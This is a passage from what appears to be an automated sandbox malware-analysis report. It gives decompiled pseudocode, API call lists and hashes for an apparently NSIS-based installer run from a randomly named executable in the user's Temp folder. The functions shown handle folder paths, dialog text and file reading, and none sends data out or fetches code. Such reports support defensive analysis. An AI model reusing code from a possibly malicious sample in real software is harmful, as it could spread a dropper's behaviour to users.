                                  				short _t82;
                                  				signed char _t84;
                                  				signed int _t85;
                                  				void* _t98;
                                  				void* _t104;
                                  				intOrPtr* _t105;
                                  				void* _t107;
                                  				WCHAR* _t108;
                                  				void* _t110;
                                  
                                  				_t107 = __esi;
                                  				_t104 = __edi;
                                  				_t71 = __ebx;
                                  				_t44 = _a8;
                                  				if(_t44 < 0) {
                                  					_t44 =  *( *0x4291fc - 4 + _t44 * 4);
                                  				}
                                  				_push(_t71);
                                  				_push(_t107);
                                  				_push(_t104);
                                  				_t105 =  *0x42a258 + _t44 * 2;
                                  				_t45 = 0x4281c0;
                                  				_t108 = 0x4281c0;
                                  				if(_a4 >= 0x4281c0 && _a4 - 0x4281c0 >> 1 < 0x800) {
                                  					_t108 = _a4;
                                  					_a4 = _a4 & 0x00000000;
                                  				}
                                  				_t81 =  *_t105;
                                  				_a8 = _t81;
                                  				if(_t81 == 0) {
                                  					L43:
                                  					 *_t108 =  *_t108 & 0x00000000;
                                  					if(_a4 == 0) {
                                  						return _t45;
                                  					}
                                  					return E00406507(_a4, _t45);
                                  				} else {
                                  					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                  						_t98 = 2;
                                  						_t105 = _t105 + _t98;
                                  						if(_t81 >= 4) {
                                  							if(__eflags != 0) {
                                  								 *_t108 = _t81;
                                  								_t108 = _t108 + _t98;
                                  								__eflags = _t108;
                                  							} else {
                                  								 *_t108 =  *_t105;
                                  								_t108 = _t108 + _t98;
                                  								_t105 = _t105 + _t98;
                                  							}
                                  							L42:
                                  							_t82 =  *_t105;
                                  							_a8 = _t82;
                                  							if(_t82 != 0) {
                                  								_t81 = _a8;
                                  								continue;
                                  							}
                                  							goto L43;
                                  						}
                                  						_t84 =  *((intOrPtr*)(_t105 + 1));
                                  						_t47 =  *_t105;
                                  						_t48 = _t47 & 0x000000ff;
                                  						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                  						_t85 = _t84 & 0x000000ff;
                                  						_v28 = _t48 | 0x00008000;
                                  						_t77 = 2;
                                  						_v16 = _t85;
                                  						_t105 = _t105 + _t77;
                                  						_v24 = _t48;
                                  						_v20 = _t85 | 0x00008000;
                                  						if(_a8 != _t77) {
                                  							__eflags = _a8 - 3;
                                  							if(_a8 != 3) {
                                  								__eflags = _a8 - 1;
                                  								if(__eflags == 0) {
                                  									__eflags = (_t48 | 0xffffffff) - _v12;
                                  									E00406544(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                  								}
                                  								L38:
                                  								_t108 =  &(_t108[lstrlenW(_t108)]);
                                  								_t45 = 0x4281c0;
                                  								goto L42;
                                  							}
                                  							_t78 = _v12;
                                  							__eflags = _t78 - 0x1d;
                                  							if(_t78 != 0x1d) {
                                  								__eflags = (_t78 << 0xb) + 0x42b000;
                                  								E00406507(_t108, (_t78 << 0xb) + 0x42b000);
                                  							} else {
                                  								E0040644E(_t108,  *0x42a228);
                                  							}
                                  							__eflags = _t78 + 0xffffffeb - 7;
                                  							if(__eflags < 0) {
                                  								L29:
                                  								E0040678E(_t108);
                                  							}
                                  							goto L38;
                                  						}
                                  						if( *0x42a2a4 != 0) {
                                  							_t77 = 4;
                                  						}
                                  						_t121 = _t48;
                                  						if(_t48 >= 0) {
                                  							__eflags = _t48 - 0x25;
                                  							if(_t48 != 0x25) {
                                  								__eflags = _t48 - 0x24;
                                  								if(_t48 == 0x24) {
                                  									GetWindowsDirectoryW(_t108, 0x400);
                                  									_t77 = 0;
                                  								}
                                  								while(1) {
                                  									__eflags = _t77;
                                  									if(_t77 == 0) {
                                  										goto L26;
                                  									}
                                  									_t59 =  *0x42a224;
                                  									_t77 = _t77 - 1;
                                  									__eflags = _t59;
                                  									if(_t59 == 0) {
                                  										L22:
                                  										_t61 = SHGetSpecialFolderLocation( *0x42a228,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                  										__eflags = _t61;
                                  										if(_t61 != 0) {
                                  											L24:
                                  											 *_t108 =  *_t108 & 0x00000000;
                                  											__eflags =  *_t108;
                                  											continue;
                                  										}
                                  										__imp__SHGetPathFromIDListW(_v8, _t108);
                                  										_a8 = _t61;
                                  										__imp__CoTaskMemFree(_v8);
                                  										__eflags = _a8;
                                  										if(_a8 != 0) {
                                  											goto L26;
                                  										}
                                  										goto L24;
                                  									}
                                  									_t63 =  *_t59( *0x42a228,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                  									__eflags = _t63;
                                  									if(_t63 == 0) {
                                  										goto L26;
                                  									}
                                  									goto L22;
                                  								}
                                  								goto L26;
                                  							}
                                  							GetSystemDirectoryW(_t108, 0x400);
                                  							goto L26;
                                  						} else {
                                  							E004063D5( *0x42a258, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                  							if( *_t108 != 0) {
                                  								L27:
                                  								if(_v16 == 0x1a) {
                                  									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                  								}
                                  								goto L29;
                                  							}
                                  							E00406544(_t77, _t105, _t108, _t108, _v16);
                                  							L26:
                                  							if( *_t108 == 0) {
                                  								goto L29;
                                  							}
                                  							goto L27;
                                  						}
                                  					}
                                  					goto L43;
                                  				}
                                  			}






























                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000400), ref: 0040665F
                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000400,00000000,004226E8,?,004055A0,004226E8,00000000,00000000,00418EC0,00000000), ref: 00406672
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Directory$SystemWindowslstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                  • API String ID: 4260037668-2673095502
                                  • Opcode ID: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
                                  • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                                  • Opcode Fuzzy Hash: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
                                  • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405569(signed int _a4, WCHAR* _a8) {
                                  				struct HWND__* _v8;
                                  				signed int _v12;
                                  				WCHAR* _v32;
                                  				long _v44;
                                  				int _v48;
                                  				void* _v52;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				WCHAR* _t27;
                                  				signed int _t28;
                                  				long _t29;
                                  				signed int _t37;
                                  				signed int _t38;
                                  
                                  				_t27 =  *0x429204;
                                  				_v8 = _t27;
                                  				if(_t27 != 0) {
                                  					_t37 =  *0x42a2d4;
                                  					_v12 = _t37;
                                  					_t38 = _t37 & 0x00000001;
                                  					if(_t38 == 0) {
                                  						E00406544(_t38, 0, 0x4226e8, 0x4226e8, _a4);
                                  					}
                                  					_t27 = lstrlenW(0x4226e8);
                                  					_a4 = _t27;
                                  					if(_a8 == 0) {
                                  						L6:
                                  						if((_v12 & 0x00000004) == 0) {
                                  							_t27 = SetWindowTextW( *0x4291e8, 0x4226e8);
                                  						}
                                  						if((_v12 & 0x00000002) == 0) {
                                  							_v32 = 0x4226e8;
                                  							_v52 = 1;
                                  							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                  							_v44 = 0;
                                  							_v48 = _t29 - _t38;
                                  							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                  							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                  						}
                                  						if(_t38 != 0) {
                                  							_t28 = _a4;
                                  							0x4226e8[_t28] = 0;
                                  							return _t28;
                                  						}
                                  					} else {
                                  						_t27 = lstrlenW(_a8) + _a4;
                                  						if(_t27 < 0x1000) {
                                  							_t27 = lstrcatW(0x4226e8, _a8);
                                  							goto L6;
                                  						}
                                  					}
                                  				}
                                  				return _t27;
                                  			}

                                  APIs
                                  • lstrlenW.KERNEL32(004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                  • lstrlenW.KERNEL32(004033ED,004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                  • lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
                                  • SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                    • Part of subcall function 00406544: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                    • Part of subcall function 00406544: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                  • String ID: &B
                                  • API String ID: 1495540970-3208460036
                                  • Opcode ID: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
                                  • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                                  • Opcode Fuzzy Hash: cd3d78f21fdbe6d171f1bc4f822c20816f526bae1c4251478e7d40ba4a5f3583
                                  • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004044CA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                  				struct tagLOGBRUSH _v16;
                                  				long _t39;
                                  				long _t41;
                                  				void* _t44;
                                  				signed char _t50;
                                  				long* _t54;
                                  
                                  				if(_a4 + 0xfffffecd > 5) {
                                  					L18:
                                  					return 0;
                                  				}
                                  				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                  				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                  					goto L18;
                                  				} else {
                                  					_t50 = _t54[5];
                                  					if((_t50 & 0xffffffe0) != 0) {
                                  						goto L18;
                                  					}
                                  					_t39 =  *_t54;
                                  					if((_t50 & 0x00000002) != 0) {
                                  						_t39 = GetSysColor(_t39);
                                  					}
                                  					if((_t54[5] & 0x00000001) != 0) {
                                  						SetTextColor(_a8, _t39);
                                  					}
                                  					SetBkMode(_a8, _t54[4]);
                                  					_t41 = _t54[1];
                                  					_v16.lbColor = _t41;
                                  					if((_t54[5] & 0x00000008) != 0) {
                                  						_t41 = GetSysColor(_t41);
                                  						_v16.lbColor = _t41;
                                  					}
                                  					if((_t54[5] & 0x00000004) != 0) {
                                  						SetBkColor(_a8, _t41);
                                  					}
                                  					if((_t54[5] & 0x00000010) != 0) {
                                  						_v16.lbStyle = _t54[2];
                                  						_t44 = _t54[3];
                                  						if(_t44 != 0) {
                                  							DeleteObject(_t44);
                                  						}
                                  						_t54[3] = CreateBrushIndirect( &_v16);
                                  					}
                                  					return _t54[3];
                                  				}
                                  			}

                                  APIs
                                  • GetWindowLongW.USER32(?,000000EB), ref: 004044E7
                                  • GetSysColor.USER32(00000000), ref: 00404525
                                  • SetTextColor.GDI32(?,00000000), ref: 00404531
                                  • SetBkMode.GDI32(?,?), ref: 0040453D
                                  • GetSysColor.USER32(?), ref: 00404550
                                  • SetBkColor.GDI32(?,?), ref: 00404560
                                  • DeleteObject.GDI32(?), ref: 0040457A
                                  • CreateBrushIndirect.GDI32(?), ref: 00404584
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                  • Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
                                  • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                  • Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                  				intOrPtr _t65;
                                  				intOrPtr _t66;
                                  				intOrPtr _t72;
                                  				void* _t76;
                                  				void* _t79;
                                  
                                  				_t72 = __edx;
                                  				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                  				_t65 = 2;
                                  				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                  				_t66 = E00402D84(_t65);
                                  				_t79 = _t66 - 1;
                                  				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                  				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                  				if(_t79 < 0) {
                                  					L36:
                                  					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
                                  				} else {
                                  					__ecx = 0x3ff;
                                  					if(__eax > 0x3ff) {
                                  						 *(__ebp - 0x44) = 0x3ff;
                                  					}
                                  					if( *__edi == __bx) {
                                  						L34:
                                  						__ecx =  *(__ebp - 0xc);
                                  						__eax =  *(__ebp - 8);
                                  						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                  						if(_t79 == 0) {
                                  							 *(_t76 - 4) = 1;
                                  						}
                                  						goto L36;
                                  					} else {
                                  						 *(__ebp - 0x38) = __ebx;
                                  						 *(__ebp - 0x18) = E00406467(__ecx, __edi);
                                  						if( *(__ebp - 0x44) > __ebx) {
                                  							do {
                                  								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                  									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060D8( *(__ebp - 0x18), __ebx) >= 0) {
                                  										__eax = __ebp - 0x50;
                                  										if(E0040607A( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                  											goto L34;
                                  										} else {
                                  											goto L21;
                                  										}
                                  									} else {
                                  										goto L34;
                                  									}
                                  								} else {
                                  									__eax = __ebp - 0x40;
                                  									_push(__ebx);
                                  									_push(__ebp - 0x40);
                                  									__eax = 2;
                                  									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                  									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                  									if(__eax == 0) {
                                  										goto L34;
                                  									} else {
                                  										__ecx =  *(__ebp - 0x40);
                                  										if(__ecx == __ebx) {
                                  											goto L34;
                                  										} else {
                                  											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                  											 *(__ebp - 0x4c) = __ecx;
                                  											 *(__ebp - 0x50) = __eax;
                                  											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                  												L28:
                                  												__ax & 0x0000ffff = E0040644E( *(__ebp - 0xc), __ax & 0x0000ffff);
                                  											} else {
                                  												__ebp - 0x50 = __ebp + 0xa;
                                  												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                  													L21:
                                  													__eax =  *(__ebp - 0x50);
                                  												} else {
                                  													__edi =  *(__ebp - 0x4c);
                                  													__edi =  ~( *(__ebp - 0x4c));
                                  													while(1) {
                                  														_t22 = __ebp - 0x40;
                                  														 *_t22 =  *(__ebp - 0x40) - 1;
                                  														__eax = 0xfffd;
                                  														 *(__ebp - 0x50) = 0xfffd;
                                  														if( *_t22 == 0) {
                                  															goto L22;
                                  														}
                                  														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                  														__edi = __edi + 1;
                                  														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                  														__eax = __ebp + 0xa;
                                  														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                  															continue;
                                  														} else {
                                  															goto L21;
                                  														}
                                  														goto L22;
                                  													}
                                  												}
                                  												L22:
                                  												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                  													goto L28;
                                  												} else {
                                  													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                  														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                  															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                  															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                  														} else {
                                  															__ecx =  *(__ebp - 0xc);
                                  															__edx =  *(__ebp - 8);
                                  															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                  															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                  														}
                                  														goto L34;
                                  													} else {
                                  														__ecx =  *(__ebp - 0xc);
                                  														__edx =  *(__ebp - 8);
                                  														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                  														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                  														 *(__ebp - 0x38) = __eax;
                                  														if(__ax == __bx) {
                                  															goto L34;
                                  														} else {
                                  															goto L26;
                                  														}
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L37;
                                  								L26:
                                  								__eax =  *(__ebp - 8);
                                  							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                  						}
                                  						goto L34;
                                  					}
                                  				}
                                  				L37:
                                  				return 0;
                                  			}









                                  APIs
                                  • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                    • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                  • String ID: 9
                                  • API String ID: 163830602-2366072709
                                  • Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                  • Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
                                  • Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                  • Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E0040678E(WCHAR* _a4) {
                                  				short _t5;
                                  				short _t7;
                                  				WCHAR* _t19;
                                  				WCHAR* _t20;
                                  				WCHAR* _t21;
                                  
                                  				_t20 = _a4;
                                  				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                  					_t20 =  &(_t20[4]);
                                  				}
                                  				if( *_t20 != 0 && E00405E4D(_t20) != 0) {
                                  					_t20 =  &(_t20[2]);
                                  				}
                                  				_t5 =  *_t20;
                                  				_t21 = _t20;
                                  				_t19 = _t20;
                                  				if(_t5 != 0) {
                                  					do {
                                  						if(_t5 > 0x1f &&  *((short*)(E00405E03(L"*?|<>/\":", _t5))) == 0) {
                                  							E00405FB2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                  							_t19 = CharNextW(_t19);
                                  						}
                                  						_t20 = CharNextW(_t20);
                                  						_t5 =  *_t20;
                                  					} while (_t5 != 0);
                                  				}
                                  				 *_t19 =  *_t19 & 0x00000000;
                                  				while(1) {
                                  					_push(_t19);
                                  					_push(_t21);
                                  					_t19 = CharPrevW();
                                  					_t7 =  *_t19;
                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                  						break;
                                  					}
                                  					 *_t19 =  *_t19 & 0x00000000;
                                  					if(_t21 < _t19) {
                                  						continue;
                                  					}
                                  					break;
                                  				}
                                  				return _t7;
                                  			}









                                  APIs
                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                  • CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                  • CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                  • CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 589700163-2982765560
                                  • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                  • Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
                                  • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                  • Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404E1E(struct HWND__* _a4, intOrPtr _a8) {
                                  				long _v8;
                                  				signed char _v12;
                                  				unsigned int _v16;
                                  				void* _v20;
                                  				intOrPtr _v24;
                                  				long _v56;
                                  				void* _v60;
                                  				long _t15;
                                  				unsigned int _t19;
                                  				signed int _t25;
                                  				struct HWND__* _t28;
                                  
                                  				_t28 = _a4;
                                  				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                  				if(_a8 == 0) {
                                  					L4:
                                  					_v56 = _t15;
                                  					_v60 = 4;
                                  					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                  					return _v24;
                                  				}
                                  				_t19 = GetMessagePos();
                                  				_v16 = _t19 >> 0x10;
                                  				_v20 = _t19;
                                  				ScreenToClient(_t28,  &_v20);
                                  				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                  				if((_v12 & 0x00000066) != 0) {
                                  					_t15 = _v8;
                                  					goto L4;
                                  				}
                                  				return _t25 | 0xffffffff;
                                  			}















                                  APIs
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
                                  • GetMessagePos.USER32 ref: 00404E41
                                  • ScreenToClient.USER32 ref: 00404E5B
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                  • Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                  • Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                  				short _v132;
                                  				int _t11;
                                  				int _t20;
                                  
                                  				if(_a8 == 0x110) {
                                  					SetTimer(_a4, 1, 0xfa, 0);
                                  					_a8 = 0x113;
                                  				}
                                  				if(_a8 == 0x113) {
                                  					_t20 =  *0x414eb8; // 0x19400
                                  					_t11 =  *0x420ec4;
                                  					if(_t20 >= _t11) {
                                  						_t20 = _t11;
                                  					}
                                  					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                  					SetWindowTextW(_a4,  &_v132);
                                  					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                  				}
                                  				return 0;
                                  			}







                                  APIs
                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                  • MulDiv.KERNEL32(00019400,00000064,?), ref: 00402FDC
                                  • wsprintfW.USER32 ref: 00402FEC
                                  • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                  • SetDlgItemTextW.USER32 ref: 0040300E
                                  Strings
                                  • verifying installer: %d%%, xrefs: 00402FE6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                  • Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
                                  • Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
                                  • Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00402950(int __ebx) {
                                  				WCHAR* _t26;
                                  				void* _t29;
                                  				long _t37;
                                  				int _t49;
                                  				void* _t52;
                                  				void* _t54;
                                  				void* _t56;
                                  				void* _t59;
                                  				void* _t60;
                                  				void* _t61;
                                  
                                  				_t49 = __ebx;
                                  				_t52 = 0xfffffd66;
                                  				_t26 = E00402DA6(0xfffffff0);
                                  				_t55 = _t26;
                                  				 *(_t61 - 0x40) = _t26;
                                  				if(E00405E4D(_t26) == 0) {
                                  					E00402DA6(0xffffffed);
                                  				}
                                  				E00405FD2(_t55);
                                  				_t29 = E00405FF7(_t55, 0x40000000, 2);
                                  				 *(_t61 + 8) = _t29;
                                  				if(_t29 != 0xffffffff) {
                                  					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                  					if( *(_t61 - 0x28) != _t49) {
                                  						_t37 =  *0x42a234;
                                  						 *(_t61 - 0x44) = _t37;
                                  						_t54 = GlobalAlloc(0x40, _t37);
